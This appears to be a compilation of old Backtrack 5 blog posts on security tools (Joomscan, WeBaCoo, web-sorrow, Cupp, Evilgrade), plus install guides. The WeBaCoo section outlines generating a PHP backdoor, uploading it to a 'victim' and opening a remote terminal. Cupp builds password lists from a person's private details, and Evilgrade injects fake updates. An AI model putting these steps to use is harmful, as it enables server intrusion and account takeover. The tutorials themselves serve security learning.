JOOMSCAN (JOOMLA SECURITY SCANNER)

                                                           Joomscan
                                 (Joomla Security Scanner)

Joomscan is one of penetration testing tool that help to find the vulnerability in Joomla CMS. The Updated version can detects 673 vulnerabilities . Detects file inclusion, sql injection, command execution vulnerabilities of a target Joomla! web site.

VIDEO TUTORIAL:
http://adf.ly/VVqO6

DOWNLOAD LINK:       LINK 1

WEBACOO - WEB BACKDOOR COOKIE SCRIPT-KIT

                                          WeBaCoo
                        (Web Backdoor Cookie Script-Kit)

Usage: webacoo.pl [options]

Options:

-g Generate backdoor code (-o is required)

-f FUNCTION PHP System function to use


FUNCTION:
1: system (default)
2: shell_exec
3: exec
4: passthru
5: popen

-o OUTPUT Generated backdoor output filename

-r Return un-obfuscated backdoor code

-t Establish remote "terminal" connection (-u is required)

-u URL Backdoor URL

-c C_NAME Cookie name (default: "M-cookie")

-d DELIM Delimiter (default: New random for each request)

-a AGENT HTTP header user-agent (default exist)

-p PROXY Use proxy (tor, ip:port or user:pass:ip:port)

-v LEVEL Verbose level
LEVEL:
0: no additional info (default)
1: print HTTP headers
2: print HTTP headers + data

-h Display help and exit

update Check for updates and apply if any

1. Generate php backdoor file
- ./webacoo.pl -g -o backdoor.php

2. Upload backdoor to victim

3. Use WeBaCoo connect to backdoor
- ./webacoo.pl -t -u http://victim/backdoor.php

4. Now you are in the victim console, do whatever you want :)

VIDEO TUTORIAL:
http://www.youtube.com/watch?v=6PS3ul7_JRo

DOWNLOAD LINK:     LINK 1

WSORROW TOOL

web-sorrow is a PERL based tool used for checking a Web server for misconfiguration, version detection, enumeration, and server information. It is NOT a vulnerability scanner, inspection proxy, DDoS tool or an exploitation framework.

Current Functionality:

-S – stands for standard. a set of Standard tests and includes: indexing of directories testing,
banner grabbing, language detection (should be obvious), robots.txt, and 200 response testing (some servers send a 200 ok for every req)


-Eb – stands for error bagging. The default config for servers is to put the server daemon and version and sometimes even the OS inside of error pages. web-sorrow reqs a URl of 20 random bytes with get and post methods.

-auth – looks for login pages with a list of some of the most common login files and dirs. We don’t need to be very big list of URLs because what else are going to name it?


-cmsPlugins – run a huge list of plugins dirs for cms servers. the list is a bit old (2010)


-I – searches the responses for interesting strings

-Ws – looks for web services such as hosting provider, blogging services, favicon fingerprinting, and cms version info

-Fd – look for generally things people don’t want you to see. The list is generated form a TON of robot.txt so whatever it finds should be interesting
-proxy – send all http reqs via a proxy. example: 255.255.255.254:8080-e – run all the scans in the scannerweb-sorrow also has false positives checking on most of it’s requests (it pretty accurate but not perfect).

VIDEO TUTORIAL:
http://www.youtube.com/watch?v=GoSzXtKGU9o

DOWNLOAD LINK:       LINK 1

Cupp (Common User Passwords Profiler)

Cupp is a common user password profiler. Using this script we can make our own dictionary on someone profiling such as a birthday, nickname, address, name of a pet or relative, or some common works like god, love, money, or any different passwords.

Options:

-h You are looking at it baby! :)
For more help take a look in docs/README
Global configuration file is cupp.cfg


-i Interactive questions for user password profiling

-w Use this option to improve existing dictionary, or WyD.pl output to make some pwnsauce

-l Download huge wordlists from repository

-a Parse default usernames and passwords directly from Alecto DB.
Project Alecto uses purified databases of Phenoelit and CIRT which where merged and enhanced.


-v Version of the program


VIDEO TUTORIAL:
http://www.youtube.com/watch?v=U0kAE3uj4Qs


DOWNLOAD LINK:    LINK 1

How to use Joomscan to find the Joomla Vulnerability in Backtrack 5 Linux?

Joomscan is one of penetration testing tool that help to find the vulnerability in Joomla CMS. TheUpdated version can detects 550 Vulnerabilities. Let me show how to use this joomscan in Backtrack5.

Download the Joomscan from here:
http://web-center.si/joomscan



Step 1: Moving to PenTest folder

Copy/Move the downloaded files in directory

/pentest/web/scanners/joomscan/

Step2: Set Permission

Now you have to set permission for the Joomscan file. In order to this, Type the following command in Terminal(if you don't know how to open terminal at all, please stop reading this and start it from basics of Linux).

CHMOD 0777 joomscan.pl

Step 3: Update

Update the scanner to latest version. To do this, enter the following command in Terminal:

./joomscan.pl update

Step 4: Scanning for Vulnerability

Now everything ok, we have to scan our joomla site for vulnerability. To do this, enter the following command in Terminal:

./joomscan.pl -u www.YourJoomlasite.com

Wait for a while, and it will list of the vulnerability found.

BACKTRACK 5 R1 RELEASED

Backtrack-Linux released Backtrac 5 R1 Linux Distribution. This release contains over 120 bug fixes, 30 new tools and 70 tool updates.The kernel was updated to 2.6.39.4 and includes the relevant injection patches.

BackTrack is intended for all audiences from the most savvy security professionals to early newcomers to the information security field. BackTrack promotes a quick and easy way to find and update the largest database of security tools collection to-date. Our community of users range from skilled penetration testers in the information security field, government entities, information technology, security enthusiasts, and individuals new to the security community. This release is their best one yet! Some pesky issues such as rfkill in VMWare with rtl8187 issues have been fixed, which provides for a much more solid experience with BackTrack.We’ve have Gnome and KDE ISO images for 32 and 64 bit (no arm this release), as well as a VMWare image of a 32 bit Gnome install, with VMWare Tools pre-installed.
We are mighty excited and are already downloading this release just as we speak.


Download Backtrack 5 R1

USEFUL THINGS IN BACKTRACK LINUX

I'm trying to write 5 most useful things you should know in Backtrack Linux. Please check it below.


1. About user name and password Backtrack use root for the username and toor for the password. You should provide it at the first time login in your first time installation.


2. startx command Don't shocked if you see the black screen with command only when you use backtrack. Backtrack designed to use command line, but if you want to enable the window, you can type startx command after you log in.


3. Metasploit Framework The most famous tools in Backtrack is Metasploit framework, this tools is used for penetration testing into vulnerable system. You can go to metasploit framework by typing /pentest/exploits/framework3/msfconsole, and there's also /pentest/exploits/framework2/msfconsole.


4. Log Out In Backtrack you cannot restart or shutdown your computer from X-Window. One thing you can do when you finish use backtrack from X-Window is Log Out. To do this, click the Dragon icon at the bottom left of your Backtrack and then Click Log Out.


5. Shutdown and Restart When you finish use the X-Windows, you will be inside the terminal again. To shutdown your Backtrack : poweroff To restart your Backtrack : reboot That's it…very simple right? just try it yourself.

EVILGRADE 2.0 ERROR ON BACKTRACK 5 - SOLVED

I'm running Evilgrade on Backtrack 5 Evilgrade is a modular framework that allows the user to take advantage of poor upgrade implementations by injecting fake updates.


It comes with pre-made binaries (agents), a working default configuration for fast pentests, and has it's own WebServer and DNSServer modules. Easy to set up new settings, and has an autoconfiguration when new binary agents are set.


When I'm trying to running Evilgrade(./evilgrade), there's some error :


./evilgrade


Can't locate Data/Dump.pm in @INC (@INC contains: /etc/perl /usr/local/lib/perl/5.10.1 /usr/local/share/perl/5.10.1 /usr/lib/perl5 usr/share/perl5 /usr/lib/perl/5.10 /usr/share/perl/5.10 /usr/local/lib/site_perl .) at isrcore/Shell.pm line 28.


To solve this error, just run

cpan Data::Dump

in your terminal Finish

HOW TO INSTALL FLASHPLAYER ON BACKTRACK 5

Install flash player on Backtrack 5 R2 step by step

Download the file below and click save to save the .deb file like shown in the screen shot

DOWNLOAD flash_player_10_linux.tar

Now type the below inside termianl, make sure you are in the downloads directory first do an ls if needed to make sure.

tar xvfz install_flash_player_10_linux.tar.gz

The result should look like the screenshot below if it went correctly

Now keep terminal open and type in the command below and press enter

mkdir ~/.mozilla/plugins

Last but not least type the command shown below into the same terminal window and press enter

mv -f libflashplayer.so ~/.mozilla/plugins/

Thats it, Flash Player should now be installed and working. Hope you enjoyed this tutorial and it helps someone out...

How To Install Backtrack 5 On Virtual Machine ?

If you want to experience and experiment with backtrack 5 hacking tools such as kismet, metasploit etc. Then today i am going to show you how you can install and run Backtrack 5 Operating System inside a virtual machine(VirtualBox). It works on all computers running any operating system such as Windows Xp, Windows 7, Or Mac Os X. So lets get stared installing backtrack 5 on your operating system.

Downloading Softwares to install Backtrack on Virtual Box

1. First you will need Virtual Machine to run Backtrack 5 which you can Download From VirtualBox Website. After downloading VirtualBox Install the program. Installing VirtualBox is really simple like any other program you install on your computer.
2. Then you will need Backtrack 5 .iso file which you can download from Here with below configuration. You can download it directly or via torrent thats your choice.

Getting started installing Backtrack 5 on Virtual Box

1. Open VirtualBox and Click on New. Then a popup box will appear in that write Name as Backtrack, Type as Linux and Version as Ubuntu as shown in below picture and click on Next.

2. Next allocate memory to your virtual machine. I usually allocate half the ram i have which is 2GB of 4GB as shown below and click Next.

3. Then choose second option Create Virtual Hard Drive Now from three options and then click on Next.
4. Then Choose VDI(Virtual Disk Image) From all the options and click Next.
5. Now to options will come to allocate size on Hard Drive from that choose Dynamically Allocated and click Next
6. Then leave name as it is and allocate the size to arround 15-20GB and click Create.
7. Now you will have your virtual machine on left. To start it double click the virtual machine. As you running it for the first time you need to configure it.
8. Navigate to the Backtrack 5 .iso file we downloaded by clicking on button i highlighted in red in below image and select it and click on start.

9. After clicking on start click Enter and leave the setting as it is and press Enter again.
10. Now it will ask for command so type startx and press Enter and it will load user interface of backtrack.
11. Click on Install Backtrack icon from desktop and it will open installation window. Now leave language to English and click on Forward. It will now ask for location, Enter your location and press Forward.
12. On Step 3,4,5,6 you don't need to do anything just click on Forward and on step 7 Click on Install. It will take couple of minutes and you will have backtrack 5 install on your computer.
13. Now will need to enter username and password to enter backtrack, the default username for backtrack is root and password is toor. You can use passswd command to change your password.
14. Done you now have Backtrack 5 running on your virtual machine.